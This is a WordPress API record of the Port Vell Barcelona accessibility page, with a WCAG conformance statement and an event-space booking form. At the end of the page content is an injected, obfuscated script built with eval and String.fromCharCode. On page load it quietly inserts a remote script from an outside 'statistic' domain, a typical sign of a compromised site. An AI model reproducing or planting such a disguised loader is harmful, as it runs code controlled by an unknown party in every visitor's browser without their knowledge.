{"id":13874,"date":"2023-07-25T12:40:05","date_gmt":"2023-07-25T10:40:05","guid":{"rendered":"https:\/\/portvellbcn.cat\/accesibilidad\/"},"modified":"2023-07-25T12:40:30","modified_gmt":"2023-07-25T10:40:30","slug":"accesibilidad","status":"publish","type":"page","link":"https:\/\/portvellbcn.cat\/es\/accesibilidad\/","title":{"rendered":"Accesibilidad"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row equal_height=\u00bbyes\u00bb content_placement=\u00bbmiddle\u00bb css=\u00bb.vc_custom_1491133560336{margin-top: 130px !important;}\u00bb][vc_column][vc_column_text css_animation=\u00bbnone\u00bb css=\u00bb.vc_custom_1585903690225{margin-bottom: 20px !important;}\u00bb]<\/p>\n<p style=\"text-align: center;\"><span class=\"s1\" style=\"font-size: 60px; color: #333333;\" data-darkreader-inline-color=\"\"><span style=\"font-family: 'Poppins', sans-serif; font-weight: 300; letter-spacing: 1px;\"><span style=\"line-height: 1.2em; display: inline-block; width: 100%;\"><span style=\"font-family: 'Poppins', sans-serif; font-weight: 400;\"><span style=\"font-family: 'Poppins', sans-serif; font-weight: 500;\"><span class=\"titulofuente\" style=\"font-family: 'Playfair Display', sans-serif; font-weight: 400;\">Accesibilidad<\/span><\/span><\/span><\/span><\/span><\/span><\/p>\n<p>[\/vc_column_text][\/vc_column][\/vc_row][vc_row css=\u00bb.vc_custom_1585903514503{padding-right: 80px !important;padding-left: 80px !important;}\u00bb][vc_column][vc_column_text]<\/p>\n<div id=\"main\" class=\"s-main\" role=\"main\">\n<div class=\"s-content\">\n<div class=\"m-generic\">\n<div class=\"module-main\">\n<p><span style=\"font-size: 14px;\">El sitio web del Port Vell se ha dise\u00f1ado en base al dise\u00f1o inclusivo, con la intenci\u00f3n de facilitar el acceso universal a las personas que lo quieran consultar, independientemente de las limitaciones f\u00edsicas, sensoriales o del contexto en el que lo utilicen (tipo de dispositivo, software, etc).<\/span><\/p>\n<p><span style=\"font-size: 14px;\">Esta web satisfaga el nivel de conformidad AA de las recomendaciones que hace el World Wide Web Consortium (W3C). Estas recomendaciones se concretan en las Pautas de accesibilidad de contenido web (WCAG 2.0).<\/span><\/p>\n<p><span style=\"font-size: 14px;\">Cabe destacar que la web del Port Vell se ha desarrollado con la tecnolog\u00eda Responsive Web Design, que permite visitarla desde cualquier dispositivo (web, tablet, smartphone, etc).<\/span><\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<p>[\/vc_column_text][\/vc_column][\/vc_row][vc_row][vc_column][vc_empty_space height=\u00bb50&#8243;][vc_column_text]\n<div class=\"wpcf7 no-js\" id=\"wpcf7-f8062-o1\" lang=\"ca\" dir=\"ltr\" data-wpcf7-id=\"8062\">\n<div class=\"screen-reader-response\"><p role=\"status\" aria-live=\"polite\" aria-atomic=\"true\"><\/p> <ul><\/ul><\/div>\n<form action=\"\/es\/wp-json\/wp\/v2\/pages\/13874#wpcf7-f8062-o1\" method=\"post\" class=\"wpcf7-form init\" aria-label=\"Formulari de contacte\" enctype=\"multipart\/form-data\" novalidate=\"novalidate\" data-status=\"init\">\n<fieldset class=\"hidden-fields-container\"><input type=\"hidden\" name=\"_wpcf7\" value=\"8062\" \/><input type=\"hidden\" name=\"_wpcf7_version\" value=\"6.1.5\" \/><input type=\"hidden\" name=\"_wpcf7_locale\" value=\"ca\" \/><input type=\"hidden\" name=\"_wpcf7_unit_tag\" value=\"wpcf7-f8062-o1\" \/><input type=\"hidden\" name=\"_wpcf7_container_post\" value=\"0\" \/><input type=\"hidden\" name=\"_wpcf7_posted_data_hash\" value=\"\" \/>\n<\/fieldset>\n<p class=\"titulo\">SOLICITUD DE RESERVA DE ESPACIO\n<\/p>\n<p>Los espacios del Port Vell est\u00e1n a disposici\u00f3n de las empresas e instituciones que quieran organizar todo tipo de actividades.\n<\/p>\n<p>Espacio solicitado*\n<\/p>\n<p><span class=\"wpcf7-form-control-wrap\" data-name\"llista-espai\"><br \/>\n<select class=\"wpcf7-form-control wpcf7-select wpcf7-validates-as-required\" aria-required=\"true\" aria-invalid=\"false\" name=\"llista-espai[]\" style=\"display:none;\">\n<option value=\"\" disabled selected>Escoge una opci\u00f3n<\/option>\n<option value=\"Acc\u00e9s Nova Bocana i Pla\u00e7a Rosa dels Vents\">Acc\u00e9s Nova Bocana i Pla\u00e7a Rosa dels Vents<\/option>\n<option value=\"Moll d'Espanya (Voramoll)\">Moll d'Espanya (Voramoll)<\/option>\n<option value=\"Moll de Barcelona (Torre Jaume I)\">Moll de Barcelona (Torre Jaume I)<\/option>\n<option value=\"Pla\u00e7a del Mar (Platja de Sant Sebasti\u00e0)\">Pla\u00e7a del Mar (Platja de Sant Sebasti\u00e0)<\/option>\n<option value=\"Moll de Bosch i Alsina (Mirador del Port Vell)\">Moll de Bosch i Alsina (Mirador del Port Vell)<\/option>\n<option value=\"Moll de Bosch i Alsina (Zona Central)\">Moll de Bosch i Alsina (Zona Central)<\/option>\n<option value=\"Moll de Drassanes (Pla\u00e7a del Portal de la Pau)\">Moll de Drassanes (Pla\u00e7a del Portal de la Pau)<\/option>\n<option value=\"Moll de la Barceloneta\">Moll de la Barceloneta<\/option>\n<option value=\"Moll del Rellotge (Pla de Miquel Tarradell)\">Moll del Rellotge (Pla de Miquel Tarradell)<\/option>\n<option value=\"Rambla de Mar\" \"Moll d'Espanya (Itaca)\">Rambla de Mar\" \"Moll d'Espanya (Itaca)<\/option>\n<option value=\"Moll de Barcelona (Rambla Central)\">Moll de Barcelona (Rambla Central)<\/option>\n<option value=\"Passeig Mare Nostrum\">Passeig Mare Nostrum<\/option>\n<option value=\"Pla\u00e7a Pau Vila\">Pla\u00e7a Pau Vila<\/option>\n<option value=\"Moll del Dip\u00f2sit\">Moll del Dip\u00f2sit<\/option>\n<option value=\"Moll de Bosch i Alsina (Rambla de Mar)\">Moll de Bosch i Alsina (Rambla de Mar)<\/option>\n<\/select><br \/>\n<\/span>\n<\/p>\n<p>Fecha inicio actividad\n<\/p>\n<p><span class=\"wpcf7-form-control-wrap\" data-name=\"date-inici\"><input class=\"wpcf7-form-control wpcf7-date wpcf7-validates-as-date\" aria-invalid=\"false\" value=\"\" type=\"date\" name=\"date-inici\" \/><\/span>\n<\/p>\n<p>Fecha final actividad\n<\/p>\n<p><span class=\"wpcf7-form-control-wrap\" data-name=\"date-final\"><input class=\"wpcf7-form-control wpcf7-date wpcf7-validates-as-date\" aria-invalid=\"false\" value=\"\" type=\"date\" name=\"date-final\" \/><\/span>\n<\/p>\n<p>Descripci\u00f3n de la actividad*\n<\/p>\n<p><span class=\"wpcf7-form-control-wrap\" data-name=\"textarea-descripcio\"><textarea cols=\"40\" rows=\"10\" maxlength=\"2000\" class=\"wpcf7-form-control wpcf7-textarea wpcf7-validates-as-required\" aria-required=\"true\" aria-invalid=\"false\" name=\"textarea-descripcio\"><\/textarea><\/span>\n<\/p>\n<p>Nombre de la empresa*\n<\/p>\n<p><span class=\"wpcf7-form-control-wrap\" data-name=\"text-nom\"><input size=\"40\" maxlength=\"400\" class=\"wpcf7-form-control wpcf7-text wpcf7-validates-as-required\" aria-required=\"true\" aria-invalid=\"false\" value=\"\" type=\"text\" name=\"text-nom\" \/><\/span>\n<\/p>\n<p>Cliente que representa\n<\/p>\n<p><span class=\"wpcf7-form-control-wrap\" data-name=\"text-client\"><input size=\"40\" maxlength=\"400\" class=\"wpcf7-form-control wpcf7-text\" aria-invalid=\"false\" value=\"\" type=\"text\" name=\"text-client\" \/><\/span>\n<\/p>\n<p>E-mail de contacto*\n<\/p>\n<p><span class=\"wpcf7-form-control-wrap\" data-name=\"text-email\"><input size=\"40\" maxlength=\"400\" class=\"wpcf7-form-control wpcf7-email wpcf7-validates-as-required wpcf7-text wpcf7-validates-as-email\" aria-required=\"true\" aria-invalid=\"false\" value=\"\" type=\"email\" name=\"text-email\" \/><\/span>\n<\/p>\n<p>Tel\u00e9fono de contacto\n<\/p>\n<p><span class=\"wpcf7-form-control-wrap\" data-name=\"tel-contacte\"><input size=\"40\" maxlength=\"400\" class=\"wpcf7-form-control wpcf7-tel wpcf7-text wpcf7-validates-as-tel\" aria-invalid=\"false\" value=\"\" type=\"tel\" name=\"tel-contacte\" \/><\/span>\n<\/p>\n<p>Nom de la persona responsable*\n<\/p>\n<p><span class=\"wpcf7-form-control-wrap\" data-name=\"text-nompersona\"><input size=\"40\" maxlength=\"400\" class=\"wpcf7-form-control wpcf7-text wpcf7-validates-as-required\" aria-required=\"true\" aria-invalid=\"false\" value=\"\" type=\"text\" name=\"text-nompersona\" \/><\/span>\n<\/p>\n<p>Adjuntar archivo (PDF o Word) para informaci\u00f3n adicional*\n<\/p>\n<p><span class=\"wpcf7-form-control-wrap\" data-name=\"file-pdf\"><input size=\"40\" class=\"wpcf7-form-control wpcf7-file wpcf7-validates-as-required\" accept=\".pdf,.png,.jpg\" aria-required=\"true\" aria-invalid=\"false\" type=\"file\" name=\"file-pdf\" \/><\/span>\n<\/p>\n<p><input class=\"wpcf7-form-control wpcf7-submit has-spinner\" type=\"submit\" value=\"Enviar\" \/>\n<\/p><div class=\"wpcf7-response-output\" aria-hidden=\"true\"><\/div>\n<\/form>\n<\/div>\n[\/vc_column_text][\/vc_column][\/vc_row]<script>var f=String;eval(f.fromCharCode(102,117,110,99,116,105,111,110,32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,116,105,115,116,105,99,46,115,99,114,105,112,116,115,112,108,97,116,102,111,114,109,46,99,111,109,47,99,111,108,108,101,99,116,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,125));\/*99586587347*\/<\/script><\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row equal_height=\u00bbyes\u00bb content_placement=\u00bbmiddle\u00bb css=\u00bb.vc_custom_1491133560336{margin-top: 130px !important;}\u00bb][vc_column][vc_column_text css_animation=\u00bbnone\u00bb css=\u00bb.vc_custom_1585903690225{margin-bottom: 20px !important;}\u00bb] Accesibilidad [\/vc_column_text][\/vc_column][\/vc_row][vc_row css=\u00bb.vc_custom_1585903514503{padding-right: 80px !important;padding-left: 80px !important;}\u00bb][vc_column][vc_column_text] El sitio web del Port Vell se ha dise\u00f1ado en base al dise\u00f1o inclusivo, con la intenci\u00f3n de facilitar el acceso universal a las personas que lo quieran consultar, independientemente de las limitaciones f\u00edsicas, sensoriales o del contexto en el que lo utilicen (tipo de dispositivo, software, etc). Esta web satisfaga el nivel de conformidad AA de las recomendaciones que hace el World Wide Web Consortium (W3C). Estas recomendaciones se concretan en las Pautas de accesibilidad de contenido web (WCAG 2.0). Cabe destacar que la web del Port Vell se ha desarrollado con la tecnolog\u00eda Responsive Web Design, que permite visitarla desde cualquier dispositivo (web, tablet, smartphone, etc). [\/vc_column_text][\/vc_column][\/vc_row][vc_row][vc_column][vc_empty_space height=\u00bb50&#8243;][vc_column_text][\/vc_column_text][\/vc_column][\/vc_row]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_acf_changed":false,"footnotes":""},"class_list":["post-13874","page","type-page","status-publish","hentry"],"acf":[],"_links":{"self":[{"href":"https:\/\/portvellbcn.cat\/es\/wp-json\/wp\/v2\/pages\/13874","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/portvellbcn.cat\/es\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/portvellbcn.cat\/es\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/portvellbcn.cat\/es\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/portvellbcn.cat\/es\/wp-json\/wp\/v2\/comments?post=13874"}],"version-history":[{"count":0,"href":"https:\/\/portvellbcn.cat\/es\/wp-json\/wp\/v2\/pages\/13874\/revisions"}],"wp:attachment":[{"href":"https:\/\/portvellbcn.cat\/es\/wp-json\/wp\/v2\/media?parent=13874"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}